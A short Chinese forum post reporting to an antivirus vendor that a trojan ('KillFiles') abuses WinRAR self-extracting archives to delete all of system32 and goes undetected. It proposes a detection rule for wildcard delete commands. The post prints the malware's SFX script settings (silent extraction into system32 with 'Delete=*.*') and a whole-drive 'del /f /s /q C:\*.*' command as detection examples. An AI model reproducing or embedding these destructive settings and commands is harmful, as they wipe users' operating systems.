该病毒利用了WINRAR与WINDOWS的漏洞：



 附件: 您所在的用户组无法下载或查看附件


瑞星对这种病毒一点也不敏感（Trojan.Win32.KillFiles），该病毒会利用WINRAR与WINDOWS的漏洞删除%windir%\system32下所有文件

我认为只要是包含删除命令（在系统盘上）与“*.*”（如：del /f /s /q C:\*.*），瑞星就应该报毒：Harm.Script.BAT.KillFiles

;下面的注释包含自解压脚本命令

Path=%SystemRoot%\system32\
Setup=cmd.exe
Presetup=cmd.exe
Silent=1
Overwrite=1
Update=U
Delete=*.*

;下面的注释包含自解压脚本命令

Path=%SystemRoot%\system32\
Overwrite=1
Update=U
Delete=*.*

用户系统信息：Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; 360SE)